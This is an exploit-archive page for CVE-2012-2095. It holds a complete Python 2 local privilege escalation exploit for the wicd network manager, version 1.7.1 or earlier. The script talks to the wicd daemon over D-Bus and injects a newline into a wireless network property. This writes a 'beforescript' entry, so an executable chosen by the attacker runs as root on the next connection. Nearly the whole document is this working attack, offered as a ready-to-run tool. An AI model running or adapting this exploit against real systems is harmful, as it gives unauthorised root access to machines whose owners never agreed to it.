wicd Local Privilege Esclation Exploit
| EKU-ID: 1910 | CVE: 2012-2095 | OSVDB-ID: |
| Author: Anonymous | Published: 2012-04-13 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1910 | CVE: 2012-2095 | OSVDB-ID: |
| Author: Anonymous | Published: 2012-04-13 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/python
#wicd <= 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt
try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)
class Error(Exception):
def __init__(self, error):
self.errorStr=error
def __str__(self):
return repr(self.errorStr)
class Wicd():
wireless=None
daemon=None
versionString=None
def __init__(self):
try:
dbusmanager.connect_to_dbus()
dbusInterfaces = dbusmanager.get_dbus_ifaces()
self.wireless = dbusInterfaces["wireless"]
self.daemon = dbusInterfaces["daemon"]
except:
raise Error("Daemon is not running")
self.versionString = self.daemon.Hello()
def versionLessThan(self, version):
if int(self.versionString.replace(".",""))<=version:
return True
else:
return False
class Exploit():
def __init__(self, wicd, scriptPath):
self.wicd = wicd
self.scriptPath = scriptPath
def getNets(self):
self.wicd.wireless.Scan(True)
nets = self.wicd.wireless.GetNumberOfNetworks()
while nets < 1:
self.wicd.wireless.Scan(True)
nets = self.wicd.wireless.GetNumberOfNetworks()
for net in range(nets):
yield net
def exploit(self):
for net in self.getNets(): pass # Priming scan.
try:
self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
except:
raise Error("Unable to exploit (SetWirelessProperty() failed.)")
try:
self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
except:
raise Error("Unable to exploit (SetWirelessProperty() failed.)")
propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property
vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey)
# TODO: Does this need a try construct?
self.wicd.wireless.ReloadConfig()
for net in self.getNets(): # Implicit, but required re-scan.
if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
self.wicd.wireless.ConnectWireless(net)
return True
raise Error("Unable to exploit (Lost the network we were using)")
def usage():
print "[!] Usage:"
print " ( -h, --help ):"
print " Print this message."
print " ( --scriptPath= ): Required, executable to run as root."
print " --scriptPath=/some/path/to/executable.sh"
def main():
print "[$] WICD =< 1.7.0Day"
try:
opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
except getopt.GetoptError, err:
# Print help information and exit:
print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
usage()
sys.exit(0)
scriptPath=None
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit(0)
elif opt =="--scriptPath":
scriptPath=arg
else:
# I would be assuming to say we'll never get here.
print "[!] Parameter error."
usage()
sys.exit(0)
if not scriptPath:
print "[!] Parameter error: scriptPath not set."
usage()
sys.exit(0)
try:
wicd = Wicd()
except Error as error:
print "[!] WICD Error: %s" % (error.errorStr)
exit(0)
print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)
if not wicd.versionLessThan(171):
print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."
exploit = Exploit(wicd, scriptPath)
print "[*] Attempting to exploit:"
try:
exploit.exploit()
except Error as error:
print "[!] Exploit Error: %s" % (error.errorStr)
exit(0)
print "[*] Exploit appears to have worked."
# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':
main()